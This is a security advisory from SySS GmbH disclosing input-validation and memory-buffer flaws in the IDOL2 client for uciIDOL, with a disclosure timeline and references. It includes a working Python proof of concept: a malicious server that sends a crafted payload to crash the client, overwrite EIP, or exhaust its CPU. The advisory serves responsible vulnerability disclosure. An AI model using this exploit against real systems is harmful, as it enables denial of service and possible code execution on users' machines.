-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-050 Product: IDOL2 (uciIDOL) Manufacturer: UCI Software GmbH Affected Version(s): ≤ 2.12 Tested Version(s): 2.12 Vulnerability Type: Improper Input Validation (CWE-20), Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-06-26 Solution Date: Public Disclosure: 2024-08-19 CVE Reference: CVE-2024-45166, CVE-2024-45167 Authors of Advisory: Ludwig Stage and Manuel Stotz, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: IDOL2 is a so-called rich client application for uciIDOL and seems to be able to provide different functionality, e.g. personnel time recording. The manufacturer describes the product as follows (see [1]): "Die uciIDOL-Produktfamilie umfasst modular einsetzbare Anwendungen für die Bereiche der Personalzeit- und Betriebsdatenerfassung sowie für die Zutrittskontrolle und Warenwirtschaft. Innerhalb dieser Hauptgruppen bieten wir Ihnen zahlreiche Funktionsbausteine, um Ihnen ein auf Ihre Bedürfnisse angepasstes System zu ermöglichen. Nach Bedarf können Sie diese durch die einzeln wählbare Module des idolWEB ergänzen. Die webbasierten Anwendungen bieten Ihnen flexibel einsetzbare Erweiterungen und zusätzliche Möglichkeiten im Umgang mit den uciIDOL-Anwendungen." Due to improper input validation, improper deserialization and improper restriction of operations within the bounds of a memory buffer, IDOL2 is vulnerable to denial-of-service (DoS) attacks and possibly remote code execution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): #!/usr/bin/env python3 import socket from hexdump import hexdump HOST = "127.0.0.1" PORT = 2012 # Access violation and EIP overwrite after five 'logins' data=b"\xB0\x00\x3C\x3C\x6F\x62\x20\x63\x6C\x3D\x22\x58\x6D\x6C\x4D\x65\x73\x73\x61\x67\x65\x22\x20\x69\x64\x3D\x22\x31\x36\x39\x38\x38\x22\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x65\x76\x65\x6E\x74\x22\x20\x76\x61\x3D\x22\x63\x6F\x6E\x6E\x65\x63\x74\x22\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x6D\x61\x6E\x64\x61\x6E\x74\x22\x20\x76\x61\x3D\x22\x31\x22\x2F\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x68\x61\x73\x6D\x61\x6E\x64\x61\x6E\x74\x22\x20\x76\x61\x3D\x22\x31\x22\x2F\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x6E\x6F\x70\x77\x64\x22\x20\x76\x61\x3D\x22\x30\x22\x2F\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x6E\x6F\x75\x73\x65\x72\x22\x20\x76\x61\x3D\x22\x30\x22\x2F\x3E\x3C\x2F\x70\x79\x3E\x3C\x2F\x6F\x62\x3E\x20\x20\x20\x20\x45\x4F\x46" # directly 100% cpu data=b'\xB0\x00' + b' EOF' print("data: " + str(data)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.bind((HOST, PORT)) s.listen() conn, addr = s.accept() with conn: print("Connected by", addr) while True: conn.sendall(data) data = conn.recv(1024) break if not data: break else: print(data) hexdump(data) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-06-26: Vulnerability reported to manufacturer 2024-06-26: Queries by the manufacturer about the circumstances under which the vulnerability was discovered 2024-06-27: Answers given to manufacturer and an offer to talk 2024-06-27: Invitation to a discussion with manufacturer 2024-07-03: Rejection of the offer to a call by the manufacturer 2024-08-12: Advisories sent to the manufacturer prior to publication 2024-08-19: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for uciIDOL https://uci.de/products/index.html [2] SySS Security Advisory SYSS-2024-050 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-050.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] IDOL2 client download site https://uci.de/download/idol2-client.html [5] IDOL2 client binary download http://download.uci.de/idol2/idol2Client_2_12.exe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Ludwig Stage and Manuel Stotz of SySS GmbH. E-Mail: ludwig.stage@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Ludwig_Stage.asc Key Fingerprint: C2FF F40D FC78 791E EF81 20DF 4B57 48C9 53A5 EE5E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwv/0Dfx4eR7vgSDfS1dIyVOl7l4FAmbG7MEACgkQS1dIyVOl 7l4xLg//ZHx3nqqe47e+n2hf2QMFyRO1r2Ry+uuG3ghZmG5ryaTo+Sdc+NPlQJLO 8JCZ4SZYsxTAtTT3CTSFATib7tzH2H0WvyPcuTMrSV5BOJdvbC/DWPVCeQkC8/U7 hKM4uA6IHZoEF4Hcp/ijRqIuYhwEe+T9xcZ524ENmaZgBEMyLoEIDH/BFRrjZkjW l4SpuWUEeCLLNguiYhv0Fou9fWzE7wwSg8YcHalWq4+GpmNhUka5o7wW/+9O5OpR Rv1BsOApC7sv0N1XXoI0PwhuP3WXJLMZ8zwqB+KvZq663gAFJrvyDbx4OiXtzyRW V4C6eXIWzRjwcLWq0Ox5MGyvSOns1/DXJcr2d/MOt7irOEPqRtfFGiOAv/88TaYU zqTndkSgfPqibEUd1jfEXwVTlGyHfOczjZItA3WS+dhHeDzwXd9t7QqS+LY0OZni efBS7BckEdX67TgLncYJYo+0w5v7CrLbeXp7g1I0c7D2eBCSeF66wXt6JAE3CXxu FkuJTlfwVhCbh4W47wQXiRX4oJJZauaTBfvKsaqjqpl6Qw9Z6dPOkWeDNFYfcm1m 59bth4AsQ4l0w4arIJnYOtGMe1YD+I+4JFMB9LXhh0AYujczoaorTIqwQtXxFSxi vC55LViSM/euf2aQ1E3CS9EOEhukYJAVGgf34sFcf637P6ibfWk= =+O8Q -----END PGP SIGNATURE-----